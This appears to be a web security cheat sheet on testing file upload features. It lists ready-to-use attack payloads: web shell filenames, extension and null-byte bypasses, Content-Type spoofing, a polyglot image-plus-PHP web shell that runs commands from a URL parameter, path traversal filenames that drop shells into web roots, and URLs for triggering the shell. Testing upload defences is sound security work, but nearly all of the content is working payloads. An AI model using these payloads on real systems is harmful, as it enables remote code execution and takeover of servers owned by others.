$loading...
Comprehensive guide to testing file upload functionality for web shell uploads, extension bypasses, content-type manipulation, and path traversal.
Find all file upload endpoints: profile picture uploads, document submission forms, import features, and API endpoints accepting file uploads. Note the allowed file types and size limits shown in the UI.
test.jpg (legitimate upload)
test.txt (test accepted types)
Try uploading executable file extensions. If blocked, test bypass techniques: double extensions, null bytes, case variations, and alternative executable extensions.
shell.php
shell.php.jpg
shell.pHp
shell.php%00.jpg
shell.phtml
shell.php5
shell.shtml
Intercept the upload request and change the Content-Type header. Some applications validate only the MIME type, not the actual file content or extension.
Content-Type: image/jpeg (with PHP content)
Content-Type: image/png (with JSP content)
Content-Type: application/octet-stream
Add valid file headers (magic bytes) to malicious files, or create polyglot files that are valid images AND executable scripts. This bypasses content-based validation.
GIF89a; <?php system($_GET["cmd"]); ?>
\xFF\xD8\xFF\xE0 + PHP code (JPEG header)
%PDF-1.5 + embedded JavaScript
Attempt to control where the file is stored by including directory traversal sequences in the filename. This can overwrite critical files or place the shell in a web-accessible directory.
../../../var/www/html/shell.php
..\..\..\inetpub\wwwroot\shell.aspx
file.php%2f..%2f..%2fshell.php
Find the URL where uploaded files are served. Check the response for file paths, try common upload directories, and test if the file executes as code when accessed directly.
/uploads/shell.php?cmd=id
/media/shell.php
/static/uploads/shell.phtml
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides